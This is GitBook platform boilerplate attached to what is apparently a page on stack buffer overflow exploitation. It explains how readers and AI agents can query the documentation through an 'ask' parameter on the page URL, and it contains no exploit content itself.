This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://archive.crow.rip/nest/binexp/stack/xpl-bof.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
